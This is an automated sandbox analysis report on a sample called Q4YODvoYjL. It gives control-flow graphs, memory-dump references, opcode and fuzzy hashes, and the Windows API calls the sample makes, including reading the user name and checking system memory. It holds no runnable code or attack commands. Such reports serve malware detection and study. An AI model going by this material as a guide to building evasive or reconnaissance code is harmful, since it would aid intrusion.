                                                                                  control_flow_graph 738 11e93d8-11ea4d0 740 11ea4d8-11ea507 LoadLibraryExW 738->740 741 11ea4d2-11ea4d5 738->741 742 11ea509-11ea50f 740->742 743 11ea510-11ea52d 740->743 741->740 742->743
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011EA2E9,00000800,00000000,00000000), ref: 011EA4FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 3ba7bc3917142b157626f80d79adf1180212129fd307139d2d883691dcccaf06
                                                                                  • Instruction ID: 833b43d4867bb0f72730a63384a270a8e916182997c48eda2f019e8ca3806f3c
                                                                                  • Opcode Fuzzy Hash: 3ba7bc3917142b157626f80d79adf1180212129fd307139d2d883691dcccaf06
                                                                                  • Instruction Fuzzy Hash: 421103B69007099FDB14CF9AD448AEEFBF4EF88310F14842AE819B7600C375A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011EA488 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 746 11ea488-11ea4d0 747 11ea4d8-11ea507 LoadLibraryExW 746->747 748 11ea4d2-11ea4d5 746->748 749 11ea509-11ea50f 747->749 750 11ea510-11ea52d 747->750 748->747 749->750
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011EA2E9,00000800,00000000,00000000), ref: 011EA4FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 5fe2ea71a5a09369f0aaff9fca3c768d09007f0083c0d65e8ea0383d21c04234
                                                                                  • Instruction ID: 266ac68a44d82081b85d9fcd08e25abc759bc1295176b77d7e9ac8e6f1e05b45
                                                                                  • Opcode Fuzzy Hash: 5fe2ea71a5a09369f0aaff9fca3c768d09007f0083c0d65e8ea0383d21c04234
                                                                                  • Instruction Fuzzy Hash: BF11E4B6D006498FDB14CFAAD548ADEFBF4AF48310F14842ED415B7600C375A545DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011EA208 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 753 11ea208-11ea248 754 11ea24a-11ea24d 753->754 755 11ea250-11ea27b GetModuleHandleW 753->755 754->755 756 11ea27d-11ea283 755->756 757 11ea284-11ea298 755->757 756->757
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 011EA26E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: d82a1884cd0c7620aafa7b6077ecb318e3faa87c62e0dbcbaceeff2b4052b52f
                                                                                  • Instruction ID: 3262f1bb938e3a0a3357abb5dc473642672f0e656edc2a10eb80cbc77dc79072
                                                                                  • Opcode Fuzzy Hash: d82a1884cd0c7620aafa7b6077ecb318e3faa87c62e0dbcbaceeff2b4052b52f
                                                                                  • Instruction Fuzzy Hash: 4A1110B2C0060A8FDB14CF9AD448ADEFBF4EF88324F10842AD429B7600C379A545CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 011EF1F8 Relevance: .3, Instructions: 315COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5dff513039aae0767e2173b6c8a6815826feaa0d40e8ff1653cc9d0c2b908eeb
                                                                                  • Instruction ID: 4d4051124ea7bfdcea3d9f7053c6d55fe6f9c1ff7dca8207639b6f85b18dbf66
                                                                                  • Opcode Fuzzy Hash: 5dff513039aae0767e2173b6c8a6815826feaa0d40e8ff1653cc9d0c2b908eeb
                                                                                  • Instruction Fuzzy Hash: B912C4F5C91746CADB30CF65E9982893BA1B7403ACBD06A08D2711FAD1D7B811AECF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011EC844 Relevance: .3, Instructions: 265COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 104ba8b57860f773d8330e9cebc6845c2708bdbba813f8e49221f8a9ddc5ad8b
                                                                                  • Instruction ID: 817ae5bebb1d70f6f5d4808353bca6e5d2022d79bb84ffc91a4fe50d1a585938
                                                                                  • Opcode Fuzzy Hash: 104ba8b57860f773d8330e9cebc6845c2708bdbba813f8e49221f8a9ddc5ad8b
                                                                                  • Instruction Fuzzy Hash: BEA1A232E0061ACFCF09DFA5C8489DDBBF2FF84304B15856AE905AB261EB31A955CF40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011EF1E8 Relevance: .2, Instructions: 240COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b035c11de4d02bfcfd7edfe64c2420f894aba0ba53e1836a57489dadaa6db25b
                                                                                  • Instruction ID: 0784f06cdd134582f2d5f878f6010d0031c1c8d2e18f01c894743f8b01e48897
                                                                                  • Opcode Fuzzy Hash: b035c11de4d02bfcfd7edfe64c2420f894aba0ba53e1836a57489dadaa6db25b
                                                                                  • Instruction Fuzzy Hash: BDC12BF1C9174ACBDB20DF65E8881893BB1BB453ACF905B08D2616F6D0D7B8246ACF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:7.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:10%
                                                                                  Total number of Nodes:30
                                                                                  Total number of Limit Nodes:3
                                                                                  execution_graph 37811 538e448 37812 538e44a 37811->37812 37813 538e519 37812->37813 37816 538f280 37812->37816 37819 538f171 37812->37819 37817 538f2b5 37816->37817 37828 538c73c 37816->37828 37817->37813 37821 538f174 37819->37821 37820 538f13c 37821->37813 37821->37820 37822 538f27a 37821->37822 37825 538f2cd CreateWindowExW 37821->37825 37823 538c73c CreateWindowExW 37822->37823 37824 538f2b5 37823->37824 37824->37813 37827 538f3f4 37825->37827 37829 538f2d0 CreateWindowExW 37828->37829 37831 538f3f4 37829->37831 37794 d75a10 37795 d75a2e 37794->37795 37798 d7489c 37795->37798 37797 d75a65 37800 d77530 LoadLibraryA 37798->37800 37801 d77629 37800->37801 37802 d7f610 37804 d7f671 GetUserNameW 37802->37804 37805 d7f75d 37804->37805 37806 66099f8 37807 6609a0d 37806->37807 37808 6609c54 37807->37808 37809 660a058 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 37807->37809 37810 660a088 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 37807->37810 37809->37807 37810->37807

                                                                                  Executed Functions

                                                                                  Function 00D7F610 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 107 d7f610-d7f66f 108 d7f671-d7f69c 107->108 109 d7f6da-d7f6de 107->109 115 d7f69e-d7f6a0 108->115 116 d7f6cc 108->116 110 d7f6e0-d7f703 109->110 111 d7f709-d7f714 109->111 110->111 113 d7f716-d7f71e 111->113 114 d7f720-d7f75b GetUserNameW 111->114 113->114 117 d7f764-d7f77a 114->117 118 d7f75d-d7f763 114->118 120 d7f6c2-d7f6ca 115->120 121 d7f6a2-d7f6ac 115->121 128 d7f6d1-d7f6d4 116->128 122 d7f790-d7f7b7 117->122 123 d7f77c-d7f788 117->123 118->117 120->128 125 d7f6b0-d7f6be 121->125 126 d7f6ae 121->126 132 d7f7c7 122->132 133 d7f7b9-d7f7bd 122->133 123->122 125->125 130 d7f6c0 125->130 126->125 128->109 130->120 135 d7f7c8 132->135 133->132 134 d7f7bf 133->134 134->132 135->135
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00D7F74B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: ee8412847519d49dcb63850444c590c99edc73d2507b44e01ee0aae377f0f632
                                                                                  • Instruction ID: c2b9ab02d767843b1d363fcff525eb7781f029682a07b9f444a5de272340394d
                                                                                  • Opcode Fuzzy Hash: ee8412847519d49dcb63850444c590c99edc73d2507b44e01ee0aae377f0f632
                                                                                  • Instruction Fuzzy Hash: 07510875D00218CFDB18CFA9C88579DBBB1BF48310F15812AE819AB355EB74A844CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0538F171 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 20 538f171-538f172 21 538f17a 20->21 22 538f174-538f178 20->22 23 538f17b-538f180 21->23 24 538f182-538f192 21->24 22->21 23->24 26 538f19a 24->26 27 538f194-538f199 24->27 28 538f19c 26->28 29 538f1a2-538f1d2 26->29 27->26 32 538f13c-538f142 28->32 33 538f19e-538f1a0 28->33 30 538f1da 29->30 31 538f1d4-538f1d8 29->31 35 538f1dc-538f1e1 30->35 36 538f1e2-538f212 30->36 31->30 42 538f143 32->42 33->29 35->36 38 538f21a 36->38 39 538f214-538f218 36->39 40 538f21c-538f221 38->40 41 538f222-538f232 38->41 39->38 40->41 43 538f23a 41->43 44 538f234-538f239 41->44 42->42 46 538f23c 43->46 47 538f242-538f252 43->47 44->43 46->47 48 538f25a 47->48 49 538f254-538f258 47->49 50 538f25c 48->50 51 538f262-538f278 48->51 49->48 50->51 52 538f27a 51->52 53 538f2cd 51->53 54 538f27c-538f27d 52->54 55 538f282-538f2b0 call 538c73c 52->55 56 538f348 53->56 57 538f2cf-538f336 53->57 54->52 58 538f27f-538f281 54->58 63 538f2b5-538f2b6 55->63 61 538f34a-538f350 56->61 62 538f353-538f3f2 CreateWindowExW 56->62 66 538f338-538f33e 57->66 67 538f341-538f346 57->67 58->55 61->62 68 538f3fb-538f433 62->68 69 538f3f4-538f3fa 62->69 66->67 67->56 73 538f440 68->73 74 538f435-538f438 68->74 69->68 75 538f441 73->75 74->73 75->75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a1e4d4c52f1a77c59b36ac18ff8a7fbe386f1f849b11f20d787c9639940efb7
                                                                                  • Instruction ID: 8d04eda17940dee16382daadbee0a3f1a134ae703a369a3683831b1893dd1b3c
                                                                                  • Opcode Fuzzy Hash: 4a1e4d4c52f1a77c59b36ac18ff8a7fbe386f1f849b11f20d787c9639940efb7
                                                                                  • Instruction Fuzzy Hash: DF919DB5D09388AFCB06DFA5C8509EDBFB5BF4A300F19819BE444AB262D3749845CF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D7F604 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 76 d7f604-d7f609 77 d7f60a-d7f60d 76->77 77->77 78 d7f60f-d7f66f 77->78 79 d7f671-d7f69c 78->79 80 d7f6da-d7f6de 78->80 86 d7f69e-d7f6a0 79->86 87 d7f6cc 79->87 81 d7f6e0-d7f703 80->81 82 d7f709-d7f714 80->82 81->82 84 d7f716-d7f71e 82->84 85 d7f720-d7f75b GetUserNameW 82->85 84->85 88 d7f764-d7f77a 85->88 89 d7f75d-d7f763 85->89 91 d7f6c2-d7f6ca 86->91 92 d7f6a2-d7f6ac 86->92 99 d7f6d1-d7f6d4 87->99 93 d7f790-d7f7b7 88->93 94 d7f77c-d7f788 88->94 89->88 91->99 96 d7f6b0-d7f6be 92->96 97 d7f6ae 92->97 103 d7f7c7 93->103 104 d7f7b9-d7f7bd 93->104 94->93 96->96 101 d7f6c0 96->101 97->96 99->80 101->91 106 d7f7c8 103->106 104->103 105 d7f7bf 104->105 105->103 106->106
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00D7F74B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: e7292d9582d54bbe08dcad4e7e4e9d536f8bbbc3f11ef616e354c13ae7cf20ff
                                                                                  • Instruction ID: cf22ac4265f1f615a08f8bafc33240be9014f7277a421a7ccddbf2241bffe021
                                                                                  • Opcode Fuzzy Hash: e7292d9582d54bbe08dcad4e7e4e9d536f8bbbc3f11ef616e354c13ae7cf20ff
                                                                                  • Instruction Fuzzy Hash: 8A511875D10218CFDB18CFA9C885BDDBBB1FF48314F14812AE819AB355EB74A845CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0660BC68 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 136 660bc68-660bc73 137 660bc75-660bc9c call 660a03c 136->137 138 660bc9d-660bcbc call 660a048 136->138 144 660bcc2-660bd21 138->144 145 660bcbe-660bcc1 138->145 152 660bd23-660bd26 144->152 153 660bd27-660bdb4 GlobalMemoryStatusEx 144->153 156 660bdb6-660bdbc 153->156 157 660bdbd-660bde5 153->157 156->157
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.569488643.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_6600000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33a02806c7cab2ba001ca96d46ac42c0e5478b758fbc4d6a69ce9b6290c044b2
                                                                                  • Instruction ID: 44ac35c972cb36908c6c375f7155f494a0f76213f641eca08672b93b9bca12bd
                                                                                  • Opcode Fuzzy Hash: 33a02806c7cab2ba001ca96d46ac42c0e5478b758fbc4d6a69ce9b6290c044b2
                                                                                  • Instruction Fuzzy Hash: 2741E172E043958FDB14DFA9D8142DFFFB1AF89310F14866AD445A7281DB789844CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0538C720 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 160 538c720-538c72a 162 538c72c-538c72e 160->162 163 538c732-538f336 160->163 162->163 167 538f338-538f33e 163->167 168 538f341-538f348 163->168 167->168 170 538f34a-538f350 168->170 171 538f353-538f38b 168->171 170->171 172 538f393-538f3f2 CreateWindowExW 171->172 173 538f3fb-538f433 172->173 174 538f3f4-538f3fa 172->174 178 538f440 173->178 179 538f435-538f438 173->179 174->173 180 538f441 178->180 179->178 180->180
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0538F3E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 8997e615d4de22b58e3ec5266c056130c0760f3f0a22db868c90c11cce65f325
                                                                                  • Instruction ID: 1035b21c9169e070821df12fbec7ea4f55a343bddcc87c5d0a17f6b39ad91e1e
                                                                                  • Opcode Fuzzy Hash: 8997e615d4de22b58e3ec5266c056130c0760f3f0a22db868c90c11cce65f325
                                                                                  • Instruction Fuzzy Hash: D551F3B1D043499FDB15DFA9C880ADEBFB5BF48314F24812AE819AB211D7749845CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0538F2C4 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 181 538f2c4-538f2c6 182 538f2c8-538f2cc 181->182 183 538f2ce 181->183 182->183 184 538f2d0-538f2d5 183->184 185 538f2d6-538f336 183->185 184->185 186 538f338-538f33e 185->186 187 538f341-538f348 185->187 186->187 189 538f34a-538f350 187->189 190 538f353-538f38b 187->190 189->190 191 538f393-538f3f2 CreateWindowExW 190->191 192 538f3fb-538f433 191->192 193 538f3f4-538f3fa 191->193 197 538f440 192->197 198 538f435-538f438 192->198 193->192 199 538f441 197->199 198->197 199->199
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0538F3E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 8f5358a0eb7abbf5e476569837572d31a2038c03eba7fffcce96fc0634fbf752
                                                                                  • Instruction ID: 4387311692ffa4fea6d63152ac592620c5fc54e2d28e48bd38911368fb0858b4
                                                                                  • Opcode Fuzzy Hash: 8f5358a0eb7abbf5e476569837572d31a2038c03eba7fffcce96fc0634fbf752
                                                                                  • Instruction Fuzzy Hash: E751B2B5D043499FDB15DFA9C884ADEBFB5FF88310F24812AE819AB210D7B49945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0538C73C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 200 538c73c-538f336 203 538f338-538f33e 200->203 204 538f341-538f348 200->204 203->204 206 538f34a-538f350 204->206 207 538f353-538f3f2 CreateWindowExW 204->207 206->207 209 538f3fb-538f433 207->209 210 538f3f4-538f3fa 207->210 214 538f440 209->214 215 538f435-538f438 209->215 210->209 216 538f441 214->216 215->214 216->216
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0538F3E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 7b570a87798d1d986f743d866e6e52db99e7a5e6226cceb57dd0f8a9bec08707
                                                                                  • Instruction ID: 81ce06688aee3dd183e8a97c8006b3f6c92e40944293962a24b871e9a5d3331e
                                                                                  • Opcode Fuzzy Hash: 7b570a87798d1d986f743d866e6e52db99e7a5e6226cceb57dd0f8a9bec08707
                                                                                  • Instruction Fuzzy Hash: 8A5193B1D103499FDB14DF9AC884ADEBBB5FF48314F24812AE819AB214D7B4A945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D77525 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 217 d77525-d77587 218 d775db-d77627 LoadLibraryA 217->218 219 d77589-d775ae 217->219 222 d77630-d77661 218->222 223 d77629-d7762f 218->223 219->218 224 d775b0-d775b2 219->224 229 d77663-d77667 222->229 230 d77671 222->230 223->222 226 d775d5-d775d8 224->226 227 d775b4-d775be 224->227 226->218 231 d775c2-d775d1 227->231 232 d775c0 227->232 229->230 234 d77669 229->234 235 d77672 230->235 231->231 233 d775d3 231->233 232->231 233->226 234->230 235->235
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 00D77617
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 7fbfcb96d0e46c0b0957d7fa454604aec9e0673d7147b22213e2df851fe4d65e
                                                                                  • Instruction ID: 3b7d341930195a2191a64d3d4f86aecc4e8f67c5004c278ccc7bcdda3e55bc7d
                                                                                  • Opcode Fuzzy Hash: 7fbfcb96d0e46c0b0957d7fa454604aec9e0673d7147b22213e2df851fe4d65e
                                                                                  • Instruction Fuzzy Hash: 38416AB0D046498FDB10CFA9C8817DDBBF1EB48310F14852AD819EB384E7749846CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D7489C Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 236 d7489c-d77587 238 d775db-d77627 LoadLibraryA 236->238 239 d77589-d775ae 236->239 242 d77630-d77661 238->242 243 d77629-d7762f 238->243 239->238 244 d775b0-d775b2 239->244 249 d77663-d77667 242->249 250 d77671 242->250 243->242 246 d775d5-d775d8 244->246 247 d775b4-d775be 244->247 246->238 251 d775c2-d775d1 247->251 252 d775c0 247->252 249->250 254 d77669 249->254 255 d77672 250->255 251->251 253 d775d3 251->253 252->251 253->246 254->250 255->255
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 00D77617
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 0b864036f2bdce4fda647313693ebea09e249fe8f7fe8d3f6c0f6d871aa720fa
                                                                                  • Instruction ID: ee461e1d3305be3d4c92327959c4653436a878ed632a9d32c1cdac27818dd24e
                                                                                  • Opcode Fuzzy Hash: 0b864036f2bdce4fda647313693ebea09e249fe8f7fe8d3f6c0f6d871aa720fa
                                                                                  • Instruction Fuzzy Hash: C3416BB0D046599FDB10CFA9C88579DBBF1EB48314F14C92AE819EB384E7749845CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0660A048 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 877 660a048-660bdb4 GlobalMemoryStatusEx 880 660bdb6-660bdbc 877->880 881 660bdbd-660bde5 877->881 880->881
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0660BCBA), ref: 0660BDA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.569488643.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_6600000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: e0fb36bcdb9cab5cb82bcb0b933bc3f594f99bee75364488086a51d998607447
                                                                                  • Instruction ID: 36eb30c6e8d4be56506c5509f380eb6f34141c2cec62657ab616dd6e2e4fa88c
                                                                                  • Opcode Fuzzy Hash: e0fb36bcdb9cab5cb82bcb0b933bc3f594f99bee75364488086a51d998607447
                                                                                  • Instruction Fuzzy Hash: 441100B1C0061A9FDB50CF9AC844BDEFBB4EB48720F14816AD818B7280D778A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D0D210 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fe9266b7d432994292a33d5ca99bbe4e4b7b98a7daab438b32ec73e6adc13610
                                                                                  • Instruction ID: a0fe8646b9ac1608e72f811096c3107e59642d1c270680992ee28c072ee77420
                                                                                  • Opcode Fuzzy Hash: fe9266b7d432994292a33d5ca99bbe4e4b7b98a7daab438b32ec73e6adc13610
                                                                                  • Instruction Fuzzy Hash: 53213A71504340EFDB05CFA4D9C0B27BF66FB88320F24856AE8490B286C336D856DBB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D0D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 250c5c434f3b5270dbb7dc43245548b4ff86b059e3bd0580af821b6809a433bb
